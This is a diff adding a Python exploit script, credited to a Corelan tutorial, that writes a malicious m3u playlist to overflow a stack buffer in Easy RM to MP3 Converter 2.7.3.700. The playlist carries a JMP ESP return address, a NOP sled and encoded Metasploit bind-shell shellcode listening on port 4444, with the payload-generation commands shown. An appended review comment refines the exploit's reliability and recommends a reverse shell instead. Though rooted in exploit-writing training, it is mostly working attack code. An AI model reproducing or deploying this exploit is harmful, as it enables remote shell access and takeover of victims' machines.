1 | - | |
1 | + | #!/usr/bin/python |
2 | ||
3 | # need the struct-libs for little-endian packing | |
4 | import struct | |
5 | ||
6 | # some fancy ascii-stuff (as adviced in corelans tutorial ;P) | |
7 | print """ ______ ____ | |
8 | / /__ ___ ____ / /___ | |
9 | __ ____/ // / _\______\_ \ / // /_ | |
10 | __\ \\ .____// \_____ / \/ // // | |
11 | o/ 0\____ \/ \ / \__ /\ /0 /o | |
12 | _//__//_______/____Y_____\ / /___/\ \\__\\_ | |
13 | <<<-Holy.Church.of.0xF00000000/___/--S3M73X\__\\2006-->>>""" | |
14 | ||
15 | print "\n -= Win32-Buffer-Overflow-Exploit for 'Easy RM to MP3 Converter v2.7.3.700' =-" | |
16 | print "\n corelan tutorial part1 - smtx.2010" | |
17 | print " greets 2 back-track-community and CORELAN" | |
18 | ||
19 | # building the buffer 26059 bytes till eip (depends on the path where the m3u is stored) | |
20 | preeip = 'PWN' + '5M7X' * ((25000 + 1056)/4) # pre buffer to reach saved EIP | |
21 | ||
22 | # overwrite saved EIP with a JMP-ESP | |
23 | # Address=01D0F23A | |
24 | # Message=Found JMP ESP at 0x1D0F23A (C:\Programme\Easy RM to MP3 Converter\MSRMCcodec02.dll) | |
25 | eip = struct.pack('<i', 0x1D0F23A) # eip | |
26 | ||
27 | # this is to stuff another 4 bytes because of the "calling"-conventions mentioned | |
28 | # here -> http://www.corelan.be:8800/index.php/forum/writing-exploits/question-about-esp-in-tutorial-pt1 | |
29 | # and there -> http://en.wikipedia.org/wiki/X86_calling_conventions | |
30 | # there are 4 bytes between ESP and our shellcode so we need this to make | |
31 | # ESP pointing onto your shellcode | |
32 | pad = 'FUCK' | |
33 | ||
34 | # i make a little nopsled just to be sure of "weird" stuff to happen | |
35 | nopsled = '\x90' * 10 | |
36 | ||
37 | # BADCAHRS: \x09 = TAB, \x0a = LINEFEED, \x00 = STRING-TERMINATOR | |
38 | # size for shellcode is 3937 (not tested) at least enough for what we want | |
39 | # testing calc: ./msfpayload windows/exec CMD=calc.exe R | ./msfencode -e x86/shikata_ga_nai -t c -b '\x00\x09\x0a' | |
40 | # this is a bind-shell-code listening on TCP-Port:4444 | |
41 | # ./msfpayload windows/shell_bind_tcp R | ./msfencode -e x86/shikata_ga_nai -t c -b '\x00\x09\x0a' | |
42 | shcode = ( | |
43 | "\xda\xc4\xd9\x74\x24\xf4\xbf\x99\xd0\x0e\xf5\x5e\x29\xc9\xb1" | |
44 | "\x56\x31\x7e\x19\x03\x7e\x19\x83\xee\xfc\x7b\x25\xf2\x1d\xf2" | |
45 | "\xc6\x0b\xde\x64\x4e\xee\xef\xb6\x34\x7a\x5d\x06\x3e\x2e\x6e" | |
46 | "\xed\x12\xdb\xe5\x83\xba\xec\x4e\x29\x9d\xc3\x4f\x9c\x21\x8f" | |
47 | "\x8c\xbf\xdd\xd2\xc0\x1f\xdf\x1c\x15\x5e\x18\x40\xd6\x32\xf1" | |
48 | "\x0e\x45\xa2\x76\x52\x56\xc3\x58\xd8\xe6\xbb\xdd\x1f\x92\x71" | |
49 | "\xdf\x4f\x0b\x0e\x97\x77\x27\x48\x08\x89\xe4\x8b\x74\xc0\x81" | |
50 | "\x7f\x0e\xd3\x43\x4e\xef\xe5\xab\x1c\xce\xc9\x21\x5d\x16\xed" | |
51 | "\xd9\x28\x6c\x0d\x67\x2a\xb7\x6f\xb3\xbf\x2a\xd7\x30\x67\x8f" | |
52 | "\xe9\x95\xf1\x44\xe5\x52\x76\x02\xea\x65\x5b\x38\x16\xed\x5a" | |
53 | "\xef\x9e\xb5\x78\x2b\xfa\x6e\xe1\x6a\xa6\xc1\x1e\x6c\x0e\xbd" | |
54 | "\xba\xe6\xbd\xaa\xbc\xa4\xa9\x1f\xf2\x56\x2a\x08\x85\x25\x18" | |
55 | "\x97\x3d\xa2\x10\x50\x9b\x35\x56\x4b\x5b\xa9\xa9\x74\x9b\xe3" | |
56 | "\x6d\x20\xcb\x9b\x44\x49\x80\x5b\x68\x9c\x06\x0c\xc6\x4f\xe6" | |
57 | "\xfc\xa6\x3f\x8e\x16\x29\x1f\xae\x18\xe3\x16\xe9\xd6\xd7\x7a" | |
58 | "\x9d\x1a\xe8\x6d\x01\x92\x0e\xe7\xa9\xf2\x99\x90\x0b\x21\x12" | |
59 | "\x06\x74\x03\x0e\x9f\xe2\x1b\x58\x27\x0d\x9c\x4e\x0b\xa2\x34" | |
60 | "\x19\xd8\xa8\x80\x38\xdf\xe5\xa0\x33\xe7\x6d\x3a\x2a\xa5\x0c" | |
61 | "\x3b\x67\x5d\xad\xae\xec\x9e\xb8\xd2\xba\xc9\xed\x25\xb3\x9c" | |
62 | "\x03\x1f\x6d\x83\xde\xf9\x56\x07\x04\x3a\x58\x89\xc9\x06\x7e" | |
63 | "\x99\x17\x86\x3a\xcd\xc7\xd1\x94\xbb\xa1\x8b\x56\x12\x7b\x67" | |
64 | "\x31\xf2\xfa\x4b\x82\x84\x03\x86\x74\x68\xb5\x7f\xc1\x96\x79" | |
65 | "\xe8\xc5\xef\x64\x88\x2a\x3a\x2d\xb8\x60\x67\x07\x51\x2d\xfd" | |
66 | "\x1a\x3c\xce\x2b\x58\x39\x4d\xde\x20\xbe\x4d\xab\x25\xfa\xc9" | |
67 | "\x47\x57\x93\xbf\x67\xc4\x94\x95\x62" | |
68 | ) | |
69 | ||
70 | trigger = '\x90' * ( 3937 - len(shcode) - len(nopsled) - len(pad) ) | |
71 | ||
72 | # lets put the attack-buffer together | |
73 | buffer = (preeip + eip + pad + nopsled + shcode + trigger) | |
74 | ||
75 | # open and write evil buffer into m3u-playlist | |
76 | print "\n - writing " + str(len(buffer)) + " bytes into m3u-playlist" | |
77 | f = open('pwn_easyRM.m3u', 'w') | |
78 | f.write(buffer) | |
79 | f.close() | |
80 | print " [x] done\n" | |
81 | ||
82 | # eof |
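Review bot: The payload file is written in text mode at `f = open('pwn_easyRM.m3u', 'w')` near the end of the hunk, so on a Windows Python 2 interpreter any 0x0a byte in the buffer would be expanded to 0x0d 0x0a and shift every byte after it; the shikata_ga_nai output here was generated with \x0a excluded, so it happens to be safe, but `f = open('pwn_easyRM.m3u', 'wb')` removes that dependency on the encoder's bad-char list. The return address is packed with a signed format, `eip = struct.pack('<i', 0x1D0F23A)`; that works for this address but any address at or above 0x80000000 raises struct.error, so `eip = struct.pack('<I', 0x1D0F23A)` is the right format for a 32-bit pointer. The `trigger` padding silently becomes an empty string if the shellcode plus pad and nopsled ever exceed 3937 bytes, which is worth pinning with `assert len(pad) + len(nopsled) + len(shcode) <= 3937, "shellcode too large for the 3937-byte region"` before the buffer is assembled. Note also that the windows/shell_bind_tcp payload opens an unauthenticated listener on TCP 4444 on the target, so this should only be detonated in an isolated lab; a reverse shell to a host you control is the safer choice.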